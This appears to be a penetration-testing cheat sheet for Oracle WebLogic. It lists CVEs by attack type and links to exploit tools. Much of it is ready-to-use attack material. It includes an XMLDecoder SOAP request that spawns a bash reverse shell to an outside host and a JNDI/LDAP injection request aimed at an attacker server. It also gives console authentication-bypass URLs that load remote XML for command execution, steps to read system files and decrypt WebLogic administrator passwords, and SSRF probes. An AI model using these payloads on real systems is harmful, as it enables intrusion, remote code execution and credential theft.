S2 |
Vulnerabilities based on the T3 protocol |
CVE-2015-4582
CVE-2016-0638
CVE-2016-3510
CVE-2018-2628
CVE-2020-2555
CVE-2020-2883
|
These CVEs can be identified directly by scanning with the WebLogic scanning tool; the tool is linked in the references to the right. |
https://www.cnblogs.com/nice0e3/p/14201884.html |
https://github.com/rabbitmask/WeblogicScan |
S3 |
Vulnerabilities based on XML parsing
|
CVE-2017-3506, CVE-2017-10271
WebLogic 10.03
|
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.1.15:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 637

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.4.0" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0"> <string>/bin/bash</string> </void>
            <void index="1"> <string>-c</string> </void>
            <void index="2"> <string>bash -i >& /dev/tcp/192.168.1.31/4444 0>&1</string> </void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
|
https://zhuanlan.zhihu.com/p/33403692
https://blog.csdn.net/qq_29647709/article/details/84928306
|
https://github.com/rabbitmask/WeblogicScan |
S4 |
Vulnerabilities based on IIOP |
CVE-2020-2551
CVE-2020-14644
|
The vulnerability can be verified with the PoC. |
https://xz.aliyun.com/t/7422?page=1
https://github.com/Y4er/CVE-2020-2551
|
https://github.com/rabbitmask/WeblogicScan |
S5 |
Vulnerabilities based on LDAP |
CVE-2021-2109
WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
|
1. Unauthenticated access address: http://ip:7001/console/css/%252e%252e%252f/consolejndi.portal
2. Start the LDAP server: https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11 ; unzip JNDIExploit.v1.11.zip and start it with java -jar JNDIExploit.v1.11.jar -i ip (the attacker machine's address)
3. Exploitation:
POST /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://81.70.146;55:1389/cqubba;AdminServer%22) HTTP/1.1
Host: ip:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
|
https://dyblogs.cn/dy/2404.html |
https://github.com/welk1n/JNDI-Injection-Exploit |
S6 |
Arbitrary file upload |
10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3
|
Upload vulnerability on the begin.do page:
http://IP:7001/ws_utc/resources/ws/config/import?timestamp=1532403983779
Upload vulnerability on the config.do page
The address where the upload vulnerability actually exists:
http://IP:7001/ws_utc/config.do
|
https://www.freebuf.com/vuls/178510.html
|
S7 |
Arbitrary file read + file upload, CVE-2019-2618 |
WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3 |
1. Arbitrary file read
Visit the URL (http://IP:7001/hello/file.jsp?path=/etc/passwd); the account and password are read successfully.
WebLogic passwords are encrypted with AES (3DES in older versions). Symmetric encryption can be decrypted: all that is needed is the user's ciphertext and the key that was used at encryption time. Both files are located under base_domain and are named SerializedSystemIni.dat and config.xml. SerializedSystemIni.dat is a binary file, so it must be read with Burp Suite; downloading it directly in a browser may introduce stray characters. In Burp, select the garbled string that was read (this is the key) and right-click "copy to file" to save it as a file:
http://yourIp:7001/hello/file.jsp?path=security/SerializedSystemIni.dat
config.xml is the global configuration file of base_domain, so it contains a lot of clutter; find the relevant value in it, which is the encrypted administrator password (a tool must be downloaded to decrypt it).
http://yourIP:7001/hello/file.jsp?path=config/config.xml
|
https://www.jianshu.com/p/7d14e45a96e7 |
https://github.com/TideSec/Decrypt_Weblogic_Password |
S8 |
SSRF |
10.0.2~10.3.6 |
http://192.168.153.134:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:1234
http://192.168.153.134:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
|
https://dyblogs.cn/dy/2275.html
https://www.cnblogs.com/-mo-/p/11503707.html
|
S9 |
Permission bypass + command execution |
Weblogic_CVE-2020-14882/14883 |
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://example.com/rce.xml")
|
https://blog.csdn.net/weixin_28975553/article/details/116535611
https://www.anquanke.com/post/id/221752